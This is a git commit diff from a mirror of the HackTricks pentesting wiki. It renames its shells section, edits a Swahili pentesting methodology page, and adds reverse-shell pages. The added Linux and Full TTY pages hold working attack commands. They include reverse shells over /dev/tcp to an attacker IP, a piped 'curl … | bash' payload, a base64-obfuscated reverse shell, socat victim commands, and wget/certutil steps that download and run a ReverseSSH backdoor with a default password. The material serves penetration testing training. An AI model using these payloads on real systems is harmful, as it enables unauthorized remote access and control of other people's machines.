Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-26 06:30:37 +00:00
Code Issues Projects Releases Packages Wiki Activity

Translated ['generic-methodologies-and-resources/pentesting-methodology.

Browse source
This commit is contained in:
Translator 2024-08-31 16:27:47 +00:00
parent 411c4f58a4
commit 52b6f9230f
8 changed files with 1333 additions and 40 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

10
SUMMARY.md
View file

@ -74,11 +74,11 @@
* [Tunneling and Port Forwarding](generic-methodologies-and-resources/tunneling-and-port-forwarding.md)
* [Threat Modeling](generic-methodologies-and-resources/threat-modeling.md)
* [Search Exploits](generic-methodologies-and-resources/search-exploits.md)
* [Shells (Linux, Windows, MSFVenom)](generic-methodologies-and-resources/shells/README.md)
* [MSFVenom - CheatSheet](generic-methodologies-and-resources/shells/msfvenom.md)
* [Shells - Windows](generic-methodologies-and-resources/shells/windows.md)
* [Shells - Linux](generic-methodologies-and-resources/shells/linux.md)
* [Full TTYs](generic-methodologies-and-resources/shells/full-ttys.md)
* [Reverse Shells (Linux, Windows, MSFVenom)](generic-methodologies-and-resources/reverse-shells/README.md)
* [MSFVenom - CheatSheet](generic-methodologies-and-resources/reverse-shells/msfvenom.md)
* [Reverse Shells - Windows](generic-methodologies-and-resources/reverse-shells/windows.md)
* [Reverse Shells - Linux](generic-methodologies-and-resources/reverse-shells/linux.md)
* [Full TTYs](generic-methodologies-and-resources/reverse-shells/full-ttys.md)
## 🐧 Linux Hardening

52
generic-methodologies-and-resources/pentesting-methodology.md
View file

@ -1,8 +1,8 @@
# Pentesting Methodology
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
Jifunze na fanya mazoezi ya AWS Hacking:<img src="../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
@ -10,7 +10,7 @@ Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" al
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* **Shiriki hila za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
@ -25,15 +25,15 @@ Ikiwa unavutiwa na **kazi ya hacking** na kuhack yasiyoweza kuhackwa - **tunataf
<figure><img src="../.gitbook/assets/HACKTRICKS-logo.svg" alt=""><figcaption></figcaption></figure>
_Logo za Hacktricks zimeundwa na_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._
_Logo za Hacktricks zimetengenezwa na_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._
### 0- Mashambulizi ya Kimwili
Je, una **ufikiaji wa kimwili** kwa mashine unayotaka kushambulia? Unapaswa kusoma baadhi ya [**mbinu kuhusu mashambulizi ya kimwili**](../hardware-physical-access/physical-attacks.md) na nyingine kuhusu [**kutoroka kutoka kwa programu za GUI**](../hardware-physical-access/escaping-from-gui-applications.md).
Je, una **ufikiaji wa kimwili** kwa mashine unayotaka kushambulia? Unapaswa kusoma baadhi ya [**hila kuhusu mashambulizi ya kimwili**](../hardware-physical-access/physical-attacks.md) na nyingine kuhusu [**kutoroka kutoka kwa programu za GUI**](../hardware-physical-access/escaping-from-gui-applications.md).
### 1 - [Kugundua mwenyeji ndani ya mtandao](pentesting-network/#discovering-hosts)/ [Kugundua Mali za kampuni](external-recon-methodology/)
**Inategemea** ikiwa **mtihani** unaofanya ni **mtihani wa ndani au wa nje** unaweza kuwa na hamu ya kutafuta **wenyeji ndani ya mtandao wa kampuni** (mtihani wa ndani) au **kutafuta mali za kampuni kwenye mtandao** (mtihani wa nje).
**Inategemea** ikiwa **mtihani** unayofanya ni **mtihani wa ndani au wa nje** unaweza kuwa na hamu ya kutafuta **wenyeji ndani ya mtandao wa kampuni** (mtihani wa ndani) au **kutafuta mali za kampuni kwenye mtandao** (mtihani wa nje).
{% hint style="info" %}
Kumbuka kwamba ikiwa unafanya mtihani wa nje, mara tu unavyoweza kupata ufikiaji wa mtandao wa ndani wa kampuni unapaswa kuanzisha tena mwongo huu.
@ -42,13 +42,13 @@ Kumbuka kwamba ikiwa unafanya mtihani wa nje, mara tu unavyoweza kupata ufikiaji
### **2-** [**Kufurahia mtandao**](pentesting-network/) **(Ndani)**
**Sehemu hii inatumika tu ikiwa unafanya mtihani wa ndani.**\
Kabla ya kushambulia mwenyeji huenda ukapendelea **kuiba baadhi ya akidi** **kutoka kwenye mtandao** au **kunusa** baadhi ya **data** ili kujifunza **kwa pasivu/aktively(MitM)** unachoweza kupata ndani ya mtandao. Unaweza kusoma [**Pentesting Network**](pentesting-network/#sniffing).
Kabla ya kushambulia mwenyeji huenda ukapendelea **kuiba baadhi ya akidi** **kutoka kwenye mtandao** au **kunusa** baadhi ya **data** ili kujifunza **kwa njia ya kupita/moja kwa moja (MitM)** unachoweza kupata ndani ya mtandao. Unaweza kusoma [**Pentesting Network**](pentesting-network/#sniffing).
### 3- [Skana Bandari - Kugundua huduma](pentesting-network/#scanning-hosts)
Jambo la kwanza kufanya unapo **angalia udhaifu katika mwenyeji** ni kujua ni **huduma zipi zinaendesha** katika bandari zipi. Hebu tuone [**zana za msingi za kuskan bandari za wenyeji**](pentesting-network/#scanning-hosts).
Jambo la kwanza kufanya unapokuwa **ukitafuta udhaifu katika mwenyeji** ni kujua ni **huduma zipi zinaendesha** katika bandari zipi. Hebu tuone [**zana za msingi za kuskan bandari za wenyeji**](pentesting-network/#scanning-hosts).
### **4-** [**Kutafuta exploit za toleo la huduma**](search-exploits.md)
### **4-** [**Kutafuta matukio ya toleo la huduma**](search-exploits.md)
Mara tu unavyojua ni huduma zipi zinaendesha, na labda toleo lao, unapaswa **kutafuta udhaifu unaojulikana**. Huenda ukapata bahati na kuna exploit inayoweza kukupa shell...
@ -59,25 +59,25 @@ Ikiwa hakuna exploit ya kuvutia kwa huduma yoyote inayofanya kazi, unapaswa kuta
**Ndani ya kitabu hiki utapata mwongozo wa pentest huduma za kawaida zaidi** (na nyingine ambazo si za kawaida sana)**. Tafadhali, tafuta kwenye orodha ya kushoto sehemu ya** _**PENTESTING**_ **(huduma zimepangwa kwa bandari zao za kawaida).**
**Ninataka kutoa kumbukumbu maalum kwa** [**Pentesting Web**](../network-services-pentesting/pentesting-web/) **sehemu (kama ni kubwa zaidi).**\
Pia, mwongozo mdogo juu ya jinsi ya [**kupata udhaifu unaojulikana katika programu**](search-exploits.md) unaweza kupatikana hapa.
Pia, mwongozo mdogo juu ya jinsi ya [**kutafuta udhaifu unaojulikana katika programu**](search-exploits.md) unaweza kupatikana hapa.
**Ikiwa huduma yako haipo ndani ya orodha, tafuta Google** kwa mafunzo mengine na **niambie ikiwa unataka niiongeze.** Ikiwa **huwezi kupata chochote** kwenye Google, fanya **pentesting yako ya kipofu**, unaweza kuanza kwa **kuungana na huduma, kuifanyia fuzzing na kusoma majibu** (ikiwa yapo).
**Ikiwa huduma yako haipo ndani ya orodha, tafuta kwenye Google** kwa mafunzo mengine na **niambie ikiwa unataka niiongeze.** Ikiwa **huwezi kupata chochote** kwenye Google, fanya **pentesting ya kipofu** mwenyewe, unaweza kuanza kwa **kuungana na huduma, kuifanyia fuzzing na kusoma majibu** (ikiwa yapo).
#### 5.1 Zana za Kiotomatiki
Pia kuna zana kadhaa ambazo zinaweza kufanya **tathmini za udhaifu za kiotomatiki**. **Ningependekeza ujaribu** [**Legion**](https://github.com/carlospolop/legion)**, ambayo ni zana niliyounda na inategemea maelezo kuhusu huduma za pentesting ambazo unaweza kupata katika kitabu hiki.**
#### **5.2 Kuangamiza huduma**
#### **5.2- Kuangamiza huduma**
Katika hali fulani **Brute-Force** inaweza kuwa na manufaa ili **kuathiri** **huduma**. [**Pata hapa CheatSheet ya huduma tofauti za kuangamiza**](brute-force.md)**.**
### 6- [Phishing](phishing-methodology/)
Ikiwa katika hatua hii huja pata udhaifu wowote wa kuvutia unaweza **kuhitaji kujaribu phishing** ili kuingia ndani ya mtandao. Unaweza kusoma mbinu yangu ya phishing [hapa](phishing-methodology/):
Ikiwa katika hatua hii huja pata udhaifu wowote wa kuvutia unaweza **kuhitaji kujaribu phishing** ili kuingia ndani ya mtandao. Unaweza kusoma mbinu zangu za phishing [hapa](phishing-methodology/):
### **7-** [**Kupata Shell**](shells/)
### **7-** [**Kupata Shell**](reverse-shells/)
Kwa namna fulani unapaswa kuwa umepata **njia yoyote ya kutekeleza msimbo** katika mwathirika. Kisha, [orodha ya zana zinazowezekana ndani ya mfumo ambazo unaweza kutumia kupata shell ya kurudi itakuwa ya manufaa sana](shells/).
Kwa namna fulani unapaswa kuwa umepata **njia yoyote ya kutekeleza msimbo** katika mwathirika. Kisha, [orodha ya zana zinazowezekana ndani ya mfumo ambazo unaweza kutumia kupata shell ya kurudi itakuwa ya manufaa sana](reverse-shells/).
Hasa katika Windows unaweza kuhitaji msaada wa **kuepuka antiviruses**: [**Angalia ukurasa huu**](../windows-hardening/av-bypass.md)**.**\\
@ -91,20 +91,20 @@ Ikiwa una matatizo na shell, unaweza kupata hapa mkusanyiko mdogo wa **amri muhi
### **9 -** [**Uhamishaji**](exfiltration.md)
Huenda ukahitaji **kutoa data kutoka kwa mwathirika** au hata **kuingiza kitu** (kama vile scripts za kupandisha mamlaka). **Hapa una** [**post kuhusu zana za kawaida ambazo unaweza kutumia kwa madhumuni haya**](exfiltration.md)**.**
Huenda ukahitaji **kutoa data kutoka kwa mwathirika** au hata **kuingiza kitu** (kama vile skripti za kupandisha mamlaka). **Hapa una** [**post kuhusu zana za kawaida ambazo unaweza kutumia kwa madhumuni haya**](exfiltration.md)**.**
### **10- Kupandisha Mamlaka**
#### **10.1- Privesc za Mitaa**
Ikiwa wewe si **root/Msimamizi** ndani ya sanduku, unapaswa kutafuta njia ya **kupandisha mamlaka.**\
Ikiwa wewe si **root/Administrator** ndani ya sanduku, unapaswa kutafuta njia ya **kupandisha mamlaka.**\
Hapa unaweza kupata **mwongozo wa kupandisha mamlaka kwa ndani katika** [**Linux**](../linux-hardening/privilege-escalation/) **na katika** [**Windows**](../windows-hardening/windows-local-privilege-escalation/)**.**\
Unapaswa pia kuangalia hizi kurasa kuhusu jinsi **Windows inavyofanya kazi**:
* [**Uthibitishaji, Akidi, Mamlaka ya Token na UAC**](../windows-hardening/authentication-credentials-uac-and-efs/)
* Jinsi [**NTLM inavyofanya kazi**](../windows-hardening/ntlm/)
* Jinsi ya [**kuiba akidi**](https://github.com/carlospolop/hacktricks/blob/master/generic-methodologies-and-resources/broken-reference/README.md) katika Windows
* Mbinu kadhaa kuhusu [_**Active Directory**_](../windows-hardening/active-directory-methodology/)
* Hila kadhaa kuhusu [_**Active Directory**_](../windows-hardening/active-directory-methodology/)
**Usisahau kuangalia zana bora za kuorodhesha njia za Kupandisha Mamlaka za ndani za Windows na Linux:** [**Suite PEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)
@ -122,15 +122,15 @@ Pata hapa njia tofauti za [**kudump nywila katika Windows**](https://github.com/
#### 11.2 - Kudumu
**Tumia aina 2 au 3 tofauti za mitambo ya kudumu ili usihitaji kuathiri mfumo tena.**\
**Hapa unaweza kupata baadhi ya** [**mbinu za kudumu kwenye active directory**](../windows-hardening/active-directory-methodology/#persistence)**.**
**Hapa unaweza kupata baadhi ya** [**hila za kudumu kwenye active directory**](../windows-hardening/active-directory-methodology/#persistence)**.**
TODO: Kamilisha kudumu Post katika Windows & Linux
### 12 - Pivoting
Kwa **akidi zilizokusanywa** unaweza kuwa na ufikiaji kwa mashine nyingine, au labda unahitaji **kugundua na kuskan wenyeji wapya** (anza tena Mbinu ya Pentesting) ndani ya mitandao mipya ambapo mwathirika wako ameunganishwa.\
Kwa **akidi zilizokusanywa** unaweza kuwa na ufikiaji kwa mashine nyingine, au labda unahitaji **kugundua na kuskan wenyeji wapya** (anzisha tena Mbinu ya Pentesting) ndani ya mitandao mipya ambapo mwathirika wako ameunganishwa.\
Katika kesi hii, tunneling inaweza kuwa muhimu. Hapa unaweza kupata [**post inayozungumzia tunneling**](tunneling-and-port-forwarding.md).\
Unapaswa pia kuangalia post kuhusu [Mbinu ya pentesting ya Active Directory](../windows-hardening/active-directory-methodology/). Huko utapata mbinu nzuri za kuhamasisha, kupandisha mamlaka na kudump akidi.\
Bila shaka unapaswa pia kuangalia post kuhusu [Mbinu ya pentesting ya Active Directory](../windows-hardening/active-directory-methodology/). Huko utapata hila nzuri za kuhamasisha, kupandisha mamlaka na kudump akidi.\
Angalia pia ukurasa kuhusu [**NTLM**](../windows-hardening/ntlm/), inaweza kuwa ya manufaa sana kuhamasisha katika mazingira ya Windows.
### ZAIDI
@ -139,13 +139,13 @@ Angalia pia ukurasa kuhusu [**NTLM**](../windows-hardening/ntlm/), inaweza kuwa
#### **Kuvunja**
* [**Kuvunja Msingi wa Linux**](broken-reference)
* [**Kuvunja Msingi wa Linux**](broken-reference/)
* [**Kuvunja Msingi wa Windows**](../binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.md)
* [**Zana za kuvunja za Msingi**](../binary-exploitation/basic-stack-binary-exploitation-methodology/tools/)
#### [**Python ya Msingi**](python/)
#### **Mbinu za Crypto**
#### **Hila za Crypto**
* [**ECB**](../crypto-and-stego/electronic-code-book-ecb.md)
* [**CBC-MAC**](../crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md)
@ -158,8 +158,8 @@ Ikiwa unavutiwa na **kazi ya hacking** na kuhack yasiyoweza kuhackwa - **tunataf
{% embed url="https://www.stmcyber.com/careers" %}
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
Jifunze na fanya mazoezi ya AWS Hacking:<img src="../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
@ -167,7 +167,7 @@ Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" al
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* **Shiriki hila za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}

53
generic-methodologies-and-resources/reverse-shells/README.md Normal file
View file

@ -0,0 +1,53 @@
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
# [**Shells - Linux**](linux.md)
# [**Shells - Windows**](windows.md)
# [**MSFVenom - CheatSheet**](msfvenom.md)
# [**Full TTYs**](full-ttys.md)
# **Shells zinazozalishwa kiotomatiki**
* [**https://reverse-shell.sh/**](https://reverse-shell.sh/)
* [**https://www.revshells.com/**](https://www.revshells.com/)
* [**https://github.com/ShutdownRepo/shellerator**](https://github.com/ShutdownRepo/shellerator)
* [**https://github.com/0x00-0x00/ShellPop**](https://github.com/0x00-0x00/ShellPop)
* [**https://github.com/cybervaca/ShellReverse**](https://github.com/cybervaca/ShellReverse)
* [**https://liftoff.github.io/pyminifier/**](https://liftoff.github.io/pyminifier/)
* [**https://github.com/xct/xc/**](https://github.com/xct/xc/)
* [**https://weibell.github.io/reverse-shell-generator/**](https://weibell.github.io/reverse-shell-generator/)
* [**https://github.com/t0thkr1s/revshellgen**](https://github.com/t0thkr1s/revshellgen)
* [**https://github.com/mthbernardes/rsg**](https://github.com/mthbernardes/rsg)
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}

134
generic-methodologies-and-resources/reverse-shells/full-ttys.md Normal file
View file

@ -0,0 +1,134 @@
# Full TTYs
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Full TTY
Kumbuka kwamba shell uliyoweka katika mabadiliko ya `SHELL` **lazima** iwe **imeorodheshwa ndani ya** _**/etc/shells**_ au `Thamani ya mabadiliko ya SHELL haikupatikana katika faili ya /etc/shells Tukio hili limeripotiwa`. Pia, kumbuka kwamba vipande vifuatavyo vinatumika tu katika bash. Ikiwa uko katika zsh, badilisha kuwa bash kabla ya kupata shell kwa kukimbia `bash`.
#### Python
{% code overflow="wrap" %}
```bash
python3 -c 'import pty; pty.spawn("/bin/bash")'
(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;
```
{% endcode %}
{% hint style="info" %}
Unaweza kupata **idadi** ya **mifereji** na **safuwima** kwa kutekeleza **`stty -a`**
{% endhint %}
#### script
{% code overflow="wrap" %}
```bash
script /dev/null -qc /bin/bash #/dev/null is to not store anything
(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;
```
{% endcode %}
#### socat
```bash
#Listener:
socat file:`tty`,raw,echo=0 tcp-listen:4444
#Victim:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
```
### **Spawn shells**
* `python -c 'import pty; pty.spawn("/bin/sh")'`
* `echo os.system('/bin/bash')`
* `/bin/sh -i`
* `script -qc /bin/bash /dev/null`
* `perl -e 'exec "/bin/sh";'`
* perl: `exec "/bin/sh";`
* ruby: `exec "/bin/sh"`
* lua: `os.execute('/bin/sh')`
* IRB: `exec "/bin/sh"`
* vi: `:!bash`
* vi: `:set shell=/bin/bash:shell`
* nmap: `!sh`
## ReverseSSH
Njia rahisi ya **interactive shell access**, pamoja na **file transfers** na **port forwarding**, ni kuweka server ya ssh iliyo na muunganisho wa kudumu [ReverseSSH](https://github.com/Fahrj/reverse-ssh) kwenye lengo.
Hapa kuna mfano wa `x86` wenye binaries zilizoshinikizwa na upx. Kwa binaries nyingine, angalia [releases page](https://github.com/Fahrj/reverse-ssh/releases/latest/).
1. Andaa mahali ili kukamata ombi la port forwarding la ssh:
{% code overflow="wrap" %}
```bash
# Drop it via your preferred way, e.g.
wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh
/dev/shm/reverse-ssh -v -l -p 4444
```
{% endcode %}
* (2a) Lengo la Linux:
{% code overflow="wrap" %}
```bash
# Drop it via your preferred way, e.g.
wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh
/dev/shm/reverse-ssh -p 4444 kali@10.0.0.2
```
{% endcode %}
* (2b) Lengo la Windows 10 (kwa toleo za awali, angalia [project readme](https://github.com/Fahrj/reverse-ssh#features)):
{% code overflow="wrap" %}
```bash
# Drop it via your preferred way, e.g.
certutil.exe -f -urlcache https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86.exe reverse-ssh.exe
reverse-ssh.exe -p 4444 kali@10.0.0.2
```
{% endcode %}
* Ikiwa ombi la kupeleka bandari la ReverseSSH lilifanikiwa, sasa unapaswa kuwa na uwezo wa kuingia kwa kutumia nenosiri la kawaida `letmeinbrudipls` katika muktadha wa mtumiaji anayekimbia `reverse-ssh(.exe)`:
```bash
# Interactive shell access
ssh -p 8888 127.0.0.1
# Bidirectional file transfer
sftp -P 8888 127.0.0.1
```
## No TTY
Ikiwa kwa sababu fulani huwezi kupata TTY kamili, bado unaweza kuingiliana na programu ambazo zinatarajia pembejeo za mtumiaji. Katika mfano ufuatao, nenosiri linapitishwa kwa `sudo` kusoma faili:
```bash
expect -c 'spawn sudo -S cat "/root/root.txt";expect "*password*";send "<THE_PASSWORD_OF_THE_USER>";send "\r\n";interact'
```
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}

362
generic-methodologies-and-resources/reverse-shells/linux.md Normal file
View file

@ -0,0 +1,362 @@
# Shells - Linux
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
**Kundi la Usalama wa Jaribio**
<figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
{% embed url="https://discord.gg/tryhardsecurity" %}
***
**Ikiwa una maswali kuhusu yoyote ya hizi shells unaweza kuangalia na** [**https://explainshell.com/**](https://explainshell.com)
## Full TTY
**Mara tu unapopata reverse shell**[ **soma ukurasa huu ili kupata full TTY**](full-ttys.md)**.**
## Bash | sh
```bash
curl https://reverse-shell.sh/1.1.1.1:3000 | bash
bash -i >& /dev/tcp/<ATTACKER-IP>/<PORT> 0>&1
bash -i >& /dev/udp/127.0.0.1/4242 0>&1 #UDP
0<&196;exec 196<>/dev/tcp/<ATTACKER-IP>/<PORT>; sh <&196 >&196 2>&196
exec 5<>/dev/tcp/<ATTACKER-IP>/<PORT>; while read line 0<&5; do $line 2>&5 >&5; done
#Short and bypass (credits to Dikline)
(sh)0>/dev/tcp/10.10.10.10/9091
#after getting the previous shell to get the output to execute
exec >&0
```
Usisahau kuangalia na shell nyingine: sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh, na bash.
### Shell salama ya alama
```bash
#If you need a more stable connection do:
bash -c 'bash -i >& /dev/tcp/<ATTACKER-IP>/<PORT> 0>&1'
#Stealthier method
#B64 encode the shell like: echo "bash -c 'bash -i >& /dev/tcp/10.8.4.185/4444 0>&1'" | base64 -w0
echo bm9odXAgYmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjQuMTg1LzQ0NDQgMD4mMScK | base64 -d | bash 2>/dev/null
```
#### Maelezo ya Shell
1. **`bash -i`**: Sehemu hii ya amri inaanzisha shell ya Bash ya kuingiliana (`-i`).
2. **`>&`**: Sehemu hii ya amri ni alama ya kifupi ya **kuhamasisha pato la kawaida** (`stdout`) na **kosa la kawaida** (`stderr`) kwenda **mahali pamoja**.
3. **`/dev/tcp/<ATTACKER-IP>/<PORT>`**: Hii ni faili maalum ambayo **inaakisi muunganisho wa TCP kwa anwani ya IP na bandari iliyoainishwa**.
